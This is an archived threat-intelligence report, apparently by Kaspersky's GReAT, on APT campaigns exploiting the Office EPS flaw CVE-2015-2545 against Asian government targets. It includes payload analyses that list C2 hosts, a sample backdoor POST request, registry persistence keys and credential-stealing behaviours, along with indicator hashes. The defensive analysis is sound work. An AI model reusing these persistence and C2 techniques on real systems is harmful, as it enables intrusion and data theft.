{ "id": "ed537e15-e3de-44bf-a77d-9f67c5a3b06a", "created_at": "2026-04-06T00:12:09.772082Z", "updated_at": "2026-04-10T03:35:34.304408Z", "deleted_at": null, "sha1_hash": "5f5a871c3a384effc66df7cba9103f909f1901ab", "title": "CVE-2015-2545: overview of current threats", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4686688, "plain_text": "CVE-2015-2545: overview of current threats\r\nBy GReAT\r\nPublished: 2016-05-25 · Archived: 2026-04-05 12:40:33 UTC\r\nCVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099. The vulnerability\r\naffects Microsoft Office versions 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1.\r\nThe error enables an attacker to execute arbitrary code using a specially crafted EPS image file. The exploit uses PostScript\r\nand can evade Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods.\r\nThe exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group,\r\npresumably against targets in India. Over the following months, there was significant growth in the number of threat actors\r\nusing the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East.\r\nIn this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these\r\ngroups.\r\nOverview of groups using CVE-2015-2545\r\nPlatinum (also known as TwoForOne)\r\nThe group is believe to originate from South-East Asia. Its attacks can be traced as far back as 2009. The group is notable for\r\nexploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against\r\ngovernment agencies in Malaysia, Indonesia, China and India.\r\nThis group was the first to exploit the CVE-2015-2545 vulnerability. After the vulnerability was corrected with Microsoft\r\nupdates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected.\r\nMicrosoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM:\r\nTargeted attacks in South and Southeast Asia.\r\nAPT16\r\nThe group has been known for several years and is believed to be of Chinese origin. In November and December 2015, it\r\nused a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan. These attacks were\r\ndescribed in a FireEye research paper – The EPS Awakens – Part 2 (https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html).\r\nEvilPost\r\nIn December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector. In order to infect\r\nvictims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft\r\nOffice using an embedded EPS (Encapsulated Postscript) object. The EPS object contained a shellcode that dropped and\r\nloaded a 32-bit or 64-bit DLL file depending on the system architecture. This, in turn exploited another vulnerability to\r\nelevate privileges to Local System (CVE-2015-1701) and download additional malware components from the C\u0026C server.\r\nThe C\u0026C server used in the attack was located in Japan and appears to have been compromised. However, there is no\r\nindication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several\r\nmonths did not result in any new findings. We believe the attackers either lost access to the server or realized that it resulted\r\nin too much attention from security researchers, as the attack was widely discussed by the Japanese security community.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 1 of 21\n\nAccording to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email\r\nwith a Word document attached.\r\nThis document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word.\r\nEven with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message. The\r\ndocument is written in good Japanese, as shown below.\r\nIt has been used to decoy New Year impressions of defense-related organizations.\r\nThis attack was also described in the FireEye report (https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html), mentioned above.\r\nAn overview of the activity of the EvilPost group activity was provided to subscribers of the Kaspersky Lab Threat\r\nIntelligence Service in March 2016. For information about the service, please write to intelreports@kaspersky.com.\r\nSPIVY\r\nIn March and April 2016, a series of emails laced with an exploit forCVE-2015-2545 were detected. The emails were sent in\r\nspear-phishing attacks, presumably targeting organizations in Hong Kong. Identifying a specific group behind these attacks\r\nis difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the\r\ngroup, SPIVY, is derived). A description of these incidents can be found in the PaloAlto blog.\r\nDanti and SVCMONDR\r\nThese two groups have not yet been publicly described. An overview of their attacks and the tools used is provided in this\r\nreport.\r\nDanti attacks\r\nDanti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting\r\nIndian government organizations. According to our telemetry, Danti has also been actively hitting targets in Kazakhstan,\r\nKyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.\r\nThe group implemented a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode. In order to infect the victim, the attackers distributed spear-phishing emails with\r\nan attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office. The exploit is based on a\r\nmalformed embedded EPS (Encapsulated Postscript) object. This contains the shellcode that drops a backdoor, providing\r\nfull access to the attackers.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 2 of 21\n\nMain findings:\r\nDanti, a previously unknown group, is probably related to NetTraveller and DragonOK\r\nIn February-March 2016 the group was observed using CVE-2015-2545\r\nIt remains active, conducting attacks against Indian diplomatic organizations\r\nRelated attacks have been observed against Central and South East Asia targets\r\nThe campaign leveraging the exploit for CVE-2015-2545 took place in February 2016. As a result, several emails with\r\nattached DOCX files were uploaded to VirusTotal. The email recipients were connected to the Indian Ministry of External\r\nAffairs, as can be seen below:\r\ndsfsi@nic.in, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG),\r\ndsfsi@mea.gov.in)\r\nchumarpost@gmail.com, possibly related to the Chumar military post in India, a disputed area between India and\r\nChina (the mail server is the same as the Indian Ministry of Foreign Affairs- vastuXX.nic.in)\r\nchancery@indianembassy.hu, the Indian embassy in Hungary\r\namb.copenhagen@mea.gov.in, the Indian Embassy in Denmark\r\namb.bogota@mea.gov.in, the Indian embassy in Colombia\r\nAll these attacks took place between the 2nd and 29th of February, 2016.\r\nTarget and date Attachment name Sender\r\nIndian embassy in Hungary\r\n2\r\nnd\r\n February\r\nMission List.doc unknown (original email was forwarded)\r\nIndian embassy in Denmark\r\n2\r\nnd\r\n February\r\nHQ List.doc mout.gmx.com ([74.208.4.200])\r\nIndian embassy in\r\nColombia\r\n2\r\nnd\r\n February\r\nHQ List.doc mout.gmx.com ([74.208.4.201])\r\nDSFSI\r\n24th February\r\nIndia’s 10 Top Luxury\r\nHotels.doc\r\n191.96.111.195 via mout.gmx.com\r\n([74.208.4.201])\r\nChumapost\r\n29th February\r\nIndia’s 10 Top Luxury\r\nHotels.doc\r\n43.227.113.129 via mout.gmx.com\r\n([74.208.4.200])\r\nIn the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the\r\nIndian IT security team in the Ministry of Foreign Affairs, and uploaded later to Virus Total.\r\nInitial vector\r\nThe emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer\r\nprogram. In all known cases, the sender used the same gate at 74.208.4.200/74.208.4.201 (mout.gmx.com).\r\nThe email messages changed for different waves of the campaign. When the campaign started in February 2nd, the emails\r\ncarried the subject headers “Mission List” and “HQ List”, and forged the identity of a real sender.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 3 of 21\n\nOriginal message used in the first wave of attacks\r\nAs can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of\r\nInformation Technology at the Indian Ministry of Communications \u0026 Information Technology.\r\nMission List decoy document\r\nAt the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for\r\nexample, those in Denmark and Colombia):\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 4 of 21\n\nOriginal HQ List email\r\nK.Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a\r\nformer Counsellor (T\u0026C) at the Embassy of India in China.\r\nHQ List decoy document\r\nBoth files (“Mission List” and “HQ list”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit\r\n(image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1).\r\nInterestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day\r\nbefore they were sent to targets.\r\nFor the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in\r\nIndia”, sent from an unknown sender.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 5 of 21\n\nTop Luxury Hotels spear-phishing email\r\nThis new attachment contains the same EPS exploit, but uses a different decoy document and a new payload.\r\nTop 10 Luxury Hotels decoy document\r\nThe text of the document was copied from a Forbes article published in 2007. According to its metadata, the document was\r\ncreated in June 2015, so it has probably been used before in unknown attacks.\r\nHowever, the same mail gate (mout.gmx.com) was used as for the 2nd February attacks.\r\nEmail header from February 29\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 6 of 21\n\nEmail header from February 24\r\nAll the “doc” files are Web Archive Files and contain decoy documents and a malicious EPS. The structure of the WAF files\r\nis the same in all three cases:\r\nWeb archive structure\r\nExploit\r\nThe attackers used at least one known 1-day exploit: the exploitforCVE-2015-2545 – EPS parsing vulnerability in\r\nEPSIMP32.FLT module, reported by FireEye, and patched by Microsoft on 8 September 2015 with MS15-099.\r\nWe are currently aware of about four different variants of the exploit.\r\nThe original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group.\r\nOriginal EPS exploit, used in August 2015\r\nThe second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then\r\nreused by cybercriminals in March 2016. This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in\r\nDecember 2015. The second variant is easily recognized by the specific strings in its EPS shellcode:\r\nThe “h:\\test.txt” string could have been forgotten by the exploit developer\r\nThe third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian\r\ndiplomatic organization. This variant uses different shellcode but is based on the original exploit from the Platinum\r\n(TwoForOne) APT:\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 7 of 21\n\nCan be recognized by “add2 \u003ceb135” substring\r\nIn the third variant, the binaries with the encrypted malicious exe file and the decoy document can be found at the end of the\r\nfiles.\r\nIn the third variant, the binary starts with “PdPD” (50 64 50 44), a marker previously used for encrypted binaries by a\r\nnumber of APT groups (Anchor Panda, Samurai Panda, Temper Panda).\r\nEncrypted data at the end of the eps file\r\nThe decryption function is 1-byte XOR with a key from “x00” to “xff” and replacement of the Odd byte for an Even byte in\r\nseveral hundred bytes from the header.\r\nDecrypted exe file\r\nDecrypted decoy document\r\nWe detected a few different EPS objects in the exploit and these are analyzed below. The fourth variant of the exploit is\r\nanalyzed in the “March attack” section.\r\nRead more about EPS objects and Payload in the Appendix.\r\nMarch attack\r\nAt the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental\r\ninstitutions. On March 28th several malicious document were sent to various recipients at the Cabinet Secretariat of\r\nGovernment India from the email account of Ms. Richa Gaharwar (\u003cricha.gaharwar@nic.in\u003e), Deputy Secretary at The\r\nDepartment of Administrative Reforms and Public Grievances, the nodal agency of the Government of India.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 8 of 21\n\nEmail sent from the account of Ms. Richa Gaharwar\r\nThe message was sent from an internal IP address using Oracle Communications Messenger. This could mean that the\r\nemployee workstation used to send the malicious emails had been fully compromised.\r\nEmail header\r\nThe attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit. This time the attackers\r\nused the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes:\r\nThey removed the part with the “h:\\test.txt” strings\r\nDropped the binary added at the end of the EPS object (the same as in the third variant of the exploit)\r\nInstead of using the “PdPD” string as a marker for binary, they used a new identifier: “1111111122222222”\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 9 of 21\n\nNew identifier used\r\nAll these changes created a new variant of the exploit, detected by very few antivirus products.\r\nThe decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before\r\nthe attack.\r\nDecoy document\r\nAccording to its metadata, the document was created and modified by Chinese users:\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 10 of 21\n\nDecoy´s metadata\r\nMarch attack – payload\r\nThe dropped file is a RarSFX archive (331307 bytes). According to comments in the archive, this was also created by a\r\nChinese user:\r\nThe dropper installs four files in the system. The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory\r\nperiodically with the GlobalMemoryStatus API function and writes the results to “C:windowsmemstatus.txt”\r\nThe main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication. The file is signed with\r\na legitimate signature from “Daum Communications Corp.”\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 11 of 21\n\nDigital signature information\r\nThis legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the\r\nhardcoded PDB path inside is “C:UsersjohnDesktopPotPlayerReleasePotPlayer.pdb”). This, in turn executes appinfo.dat (the\r\nhardcoded PDB path inside is “D:BaiduYunDownloadServiceExeReleaseServiceExe.pdb”), which is a Yoda-compressed\r\nbinary. The backdoor code is stored inside update.dat.\r\nThe potplayer.dll “PreprocessCmdLineEx” export function:\r\nCreates a service named “MemoryStatus” with a path to “appinfo.dat” file and sets it to HKEY_CURRENT_USER\r\nSoftwareMicrosoftWindowsCurrentVersionRun with the name “potplayer”.\r\nOpens “update.dat” file, decrypts it with xor operations and passes the execution to the result buffer.\r\n“update.dat”, a backdoor:\r\nMakes its first GET request to hardcoded CnC “newsupdate.dynssl.com/index.html” in order to get the new CnC in the\r\nresponse.\r\nIf 407 response code is returned (Proxy authentication required) then the sample sends the request again with “proxyname”\r\nstring as the proxy username and “proxypass” string as the proxy password. That suggests that may be the sample is\r\ncompiled using some builder where these parameters must be set manually and in this specific sample were not changed\r\nfrom default.\r\nFinds “8FC628C9F43D42E2B77C2801518AF2A5” substring and decrypts it using AES CTR mode thrice using three 16-\r\nbytes keys.\r\nMakes a POST request to the new CnC with “im=validate” URL parameter and expects “success” string as the response.\r\nForms the following structure in order to send to CnC in POST-request after AES encryption:\r\n“CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 12 of 21\n\nLocal IP\r\nHost name\r\n0x3E9 dword\r\nOS version\r\nSYSTEM_INFO structure\r\nDecrypts the response using AES with one key.\r\nCommands:\r\nLists files in directory\r\nEnumerates drives and their type\r\nEnumerates given registry key and value\r\nEnumerates processes\r\nDeletes given file\r\nCreates given process\r\nMoves or copies given file\r\nUploads file\r\nWrites to file and launches it\r\nEnumerates services\r\nTerminates given process\r\nProvides shell via cmd.exe\r\nThe malware connects to the following C2s:\r\nnewsupdate.dynssl.com (103.61.136.120)\r\ndnsnews.dns05.com (118.193.12.252)\r\nThe connection:\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 13 of 21\n\nThe two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS.\r\nSVCMONDR: the Taiwan case\r\nIn December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. On 11\r\nDecember, a spear-phishing email was sent by attackers to an employee of a Taiwanese security software reseller.\r\nSpear-phishing email\r\nThe attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside.\r\n“1-3說明檔.doc”\r\nThis EPS (98c57aa9c7e3f90c4eb4afeba8128484) is exploit CVE-2015-2545 and contains an encrypted binary starting with\r\n“PdPD” (50 64 50 44), the same as seen in the Danti attacks.\r\nThe structure of the Web Archive also carries references to the same files as the Danti group (with image002.gif and\r\n“image002.eps”.) However, the files themselves are absent from the archive.\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 14 of 21\n\nPart of the Web Archive\r\nThis resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or\r\nyet another case of different groups using the same malicious code. That’s why we are noting this incident separately from\r\nthe Danti group’s activity.\r\nInterestingly, in the first few days of December, another group – APT16 (FireEye’s classification) also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by\r\nthe SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER\r\n(https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html).\r\nAfter opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program\r\n“svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b).\r\nThis queries the registry:\r\n“HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsDefaultConnectionSettings” and\r\n“HKCUSoftwareMicrosoftWindowsCurrentVersionInternetSettingsConnectionsDefaultConnectionSettings” and compares\r\nthe values. If they don’t coincide, it sets the “DefaultConnectionSettings” value from the HKEY_USERS to HKCU key.\r\nIt sets values taken from:\r\n1. 1 HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3 {A8A88C49-5EB2-4990-\r\nA1A2-0876022C854F}\r\n2. 2 HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3 {AEBA21FA-782A-4A90-\r\n978D-B72164C80120}\r\n3. 3 HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones31A10\r\nTo the appropriate HKCU key (for example: HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3\r\n{A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.).\r\nThen forms the structure in order to send it to the CnC in a POST-request with the following fields:\r\n0x8888 constant\r\n0x8000 constant\r\n18-bytes hex string based on CoCreateGuid function\r\nLocal IP\r\nMAC address\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 15 of 21\n\nExample of POST request\r\nIt encodes the resulting structure with base64. Example of a POST request:\r\nPOST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\nHost: 59.188.13.204:9080\r\nContent-Length: 112\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nAAAAAIiIAAAAgAAAAAAAAGQwNTRlYTkxMDAwMGEyZmU3NAAAAAAAAAAAAAAAAAAAMTAuNjMuMTIuNAAAAAAAADAwMEM\r\nBased on the CnC response, the sample:\r\nChecks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration\r\nstructure. If the password is valid, it sets a “certified” flag and can further process the following commands.\r\nLaunches given command line with ShellExecute, writes output results to %tmp% file, sends results to CnC and\r\ndeletes the file.\r\nDownloads file to %Temp% folder.\r\nUploads given file to CnC.\r\nSets sleep interval.\r\nAll results sent to the CnC after processing commands are encrypted with RC4 with a MAC-address as a key.\r\nThe CnC points to an IP address in Hong Kong. This IP address belongs to a local private company, but falls within a range\r\nof IP addresses that belong to another enterprise that has already been identified as a host location for command and control\r\nservers that communicate with malware.\r\nThe CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda”\r\n(59.188.0.197, accounts.serveftp.com).\r\nIn general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command \u0026 control servers/proxies.\r\nAnother detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64\r\n50 44) marker for encrypted binaries. According to Crowdstrike, the same marker has been used previously by a number of\r\nAPT groups (Anchor Panda, Samurai Panda and Temper Panda).\r\nThe latest known activity of “admin@338” was in August 2015, when it was used to target Hong Kong-based media using\r\nits own tools, LOWBALL and BUBBLEWRAP.\r\nHowever, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper\r\nPanda.\r\nAccording to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand.\r\nConclusions\r\nWe are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability:\r\nTwoForOne (also known as Platinum), EvilPost, APT16 and Danti.\r\nThese groups have their own toolsets of malicious program. Danti’s arsenal is more extensive than those of EvilPost and\r\nAPT16, and in terms of functionality can be compared with Platinum. All groups are focused on targets in the Asian region\r\nand have never been seen in incidents in Western Europe or the USA.\r\nThe TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in\r\nKaspersky Lab private reports.\r\nDanti is highly focused on diplomatic entities. It may already have full access to internal networks in Indian government\r\nstructures. According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan,\r\nKyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.\r\nDespite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus\r\ndetections. A number of the modules used by Danti have the same functionality as previously known and used malicious\r\nprograms like NetTraveller and DragonOK.\r\nThe use of CVE-2015-2545 exploits is on the rise. In addition to the groups mentioned above, we have seen numerous\r\nexamples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016. Such attacks\r\nmostly target financial institutions in Asia. Specifically, attacks have been recorded in Vietnam, the Philippines and\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 16 of 21\n\nMalaysia. There are reasons to believe that Nigerian cybercriminals are behind these attacks. In some cases, the\r\ninfrastructure used is the same as the one we saw when analyzing the Adwind Trojan.\r\nWe expect to see more incidents with this exploit and we continue to monitor new waves of attacks and the potential\r\nrelationship with other attacks in the region.\r\nTo know more about how to address the issue of known vulnerabilities most properly, read this post in the Kaspersky\r\nBusiness Blog.\r\nAdditional references:\r\nThe EPS Awakens\r\nPart 1\r\nPart 2: https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html\r\nUnit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets\r\nNew Poison Ivy Rat Variant targets Hong-Kong-Pro-Democracy Activists\r\nMicrosoft research “Platinum”\r\nEvilPost attacks (Kaspersky Lab Private Report, March 2016)\r\nAppendix A: EPS Objects their payload and http.exe trojan analysis\r\nEPS Objects\r\nFile MD5: a90a329335fa0af64d8394b28e0f86c1\r\nFile type: Encapsulated Postscript File\r\nSize: 189’238 bytes\r\nFile Name: image001.eps (from HQ list)\r\nThis EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.\r\nThe dropped malicious files are described below.\r\nFile MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5\r\nFile type: Encapsulated Postscript File\r\nSize: 211’766 bytes\r\nFile Name: image001.eps (from Mission list)\r\nThis EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.\r\nThe dropped malicious files are described below.\r\nFile MD5: b751323586c5e36d1d644ab42888a100\r\nFile type: Encapsulated Postscript File\r\nSize: 398’648 bytes\r\nFile Name: image001.eps (from India’s 10 Top Luxury Hotels)\r\nThis EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and decoy document to disk.\r\nThe dropper and dropped malicious file “http.exe” are described below.\r\nPayload analysis\r\nBackdoor\r\nFile Name lsass.exe\r\nMD5 8ad9cb6b948bcf7f9211887e0cf6f02a\r\nFile type PE32 executable for MS Windows (GUI) Intel 80386 32-bit\r\nCompilation timestamp 2015-12-28 07:47:54\r\nPE Resources BIN (CHINESE SIMPLIFIED)\r\nSize 138’240 bytes\r\nURL: http://goback.strangled[.]net:443/ [random string]\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 17 of 21\n\nTYPE: POST\r\nUSER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR\r\n3.0.04506.648; .NET CLR 3.5.21022)\r\nReal IP: 180.150.227.135:443\r\nDrops file from its resource section to %ALLUSERSPROFILE% IEHelpermshtml.dll. The backdoor then writes a string to\r\na given offset with the value dependent on the %ALLUSERSPROFILE% environment variable.\r\nThus, the md5 of dropped files can vary. Examples of md5 with standard variables:\r\nbe0cc8411c066eac246097045b73c282\r\nbae673964e9bc2a45ebcc667895104ef\r\nSets registry:\r\nIf user is not admin\r\n“HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersioRun” value {53372C34-A872-FACF-70A7-\r\nA23C81C766C4} = “C:WindowsSystem32rundll32.exe %ALLUSERSPROFILE% IEHelpermshtml.dll, IEHelper”\r\nIn any case:\r\nHKEY_LOCAL_MACHINESoftwareMicrosoftActive SetupInstalled Components{53372C34-A872-FACF-70A7-\r\nA23C81C766C4}” value “StubPath” = “C:WindowsSystem32rundll32.exe %ALLUSERSPROFILE% IEHelpermshtml.dll,\r\nIEHelper”\r\nSets the following values before creating the instance of IE for communicating with the CnC:\r\nHKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain DisableFirstRunCustomize=1\r\nHKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain Check_Associations=”no”\r\nHKEY_CURRENT_USERSoftwareMicrosoftInternet Connection Wizard Completed=1\r\nHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap IEHarden=0\r\nCollects the following info, encodes with base64 and sends to the CnC:\r\nMemory status\r\nOS version\r\nUser name\r\nOEM code page identifier\r\nLocal IP\r\nCPU speed\r\nForms the following body in POST request to the CnC:\r\n—-=_Part_%x\r\nContent-Disposition: form-data; name=”m1.jpg”\r\nContent-Type: application/octet-steam\r\n%base64%\r\n—-=_Part_%x\r\nWhere %x – decrypted adapter’s MAC address based on xor operation.\r\nThe URL path in the POST request is generated randomly with uppercase letters.\r\nExample of CnC communication:\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 18 of 21\n\nBased on the CnC response, the sample:\r\nProvides shell via cmd.exe\r\nCreates directory\r\nLists files in directory\r\nDeletes file\r\nUploads given file to CnC\r\nEnumerates drives, gets their type and available space\r\nLaunches given file\r\nMoves file\r\nWrites and appends to given file\r\nUninstalls itself\r\nFile Name mshtml.dll\r\nMD5\r\nbe0cc8411c066eac246097045b73c282\r\nor bae673964e9bc2a45ebcc667895104ef\r\nor different\r\nFile type PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit\r\nCompilation timestamp 2015-12-28 07:45:20\r\nSize 72’192 bytes\r\nmshtml.dll repeats entirely the functionality of its dropper (CnC communication and commands processing) in its “IEhelper”\r\nexport and is built on the same source code.\r\nhttp.exe trojan\r\nMD5 6bbdbf6d3b24b8bfa296b9c76b95bb2f | Sun, 13 Apr 2008 18:32:45 GMT\r\nDrops file to %Temp%IXP000.TMPhttp.exe and launches it.\r\nFilename http.exe\r\nMD5 3fbe576d33595734a92a665e72e5a04f | Wed, 13 Jan 2016 10:25:10 GM\r\nCnC carwiseplot.no-ip.org/news/news.asp\r\nSets registry:\r\nHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun\r\n“IME_hp” = %ALLUSERPROFILE%Accessorieswordpade.exe\r\nHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun\r\n“IME_hp” = %ALLUSERPROFILE%Accessorieswordpade.exe\r\nHKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun\r\n“IME_hp” = %ALLUSERPROFILE%Accessorieswordpade.exe\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 19 of 21\n\nCopies itself to %ALLUSERPROFILE%Accessorieswordpade.exe, launches it and exits self-process.\r\nwordpade.exe file proceeds:\r\nCreates mutex “GlobalwordIE”. Stores keystrokes and windows titles to %Temp%dumps.dat and xors it with 0x99.\r\nKnocks to CnC via IE instance: carwiseplot.no-ip.org/news/news.asp\r\nIncludes the following field in HTTP-header:\r\nCookie: ID=1%x, where %x – Volume Serial number of disk C\r\nBased on the CnC response, the sample:\r\nProvides shell via cmd.exe\r\nLists files in all drives and writes to given file\r\nRetrieves OS version, Local IP, installed browser, Computer name, User name and writes to given file\r\nWrites to given file\r\nDeletes given file\r\nUploads given file to CnC\r\nMakes screenshots and writes to file %Temp%makescr.dat\r\nRetrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome\r\nfiles (%LOCALAPPDATA%GoogleChromeUser DataDefaultLogin Data), Microsoft WinInet storage, Microsoft\r\nOutlook\r\nAppendix B: Danti sample hashes\r\nEmails:\r\naae962611da956a26a76d185455f1d44 (chancery@indianembassy.hu)\r\n3ed40dec891fd48c7ec6fa49b1058d24 (amb.bogota@mea.gov.in)\r\n1aefd1c30d1710f901c70be7f1366cae (amb.copenhagen@mea.gov.in)\r\nf4c1e96717c82b14ca76384cb005fbe5 (India, dsfsi@nic.in)\r\n1ba92c6d35b7a31046e013d35fa48775 (India, chumarpost@gmail.com)\r\n6d55eb3ced35c7479f67167d84bf15f0 (India, Cabinet Secretary)\r\nDoc (Web Archive File):\r\nC591263d56b57dfadd06a68dd9657343 (HQ List)\r\nAebf03ceaef042a833ee5459016f5bde (Mission List)\r\nFd6636af7d2358c40fe6923b23a690e8 (India’s 10 Top Luxury Hotels)\r\nDocx:\r\nD91f101427a39d9f40c41aa041197a9c (Holidays in India in 2016)\r\nEPS:\r\n07f4b663cc3bcb5899edba9eaf9cf4b5 (India, from Mission list)\r\na90a329335fa0af64d8394b28e0f86c1 (India, HQ List)\r\nB751323586c5e36d1d644ab42888a100 (India, Hotels)\r\n8cd2eb90fabd03ac97279d398b09a5e9 (Holidays in India in 2016)\r\nCAB 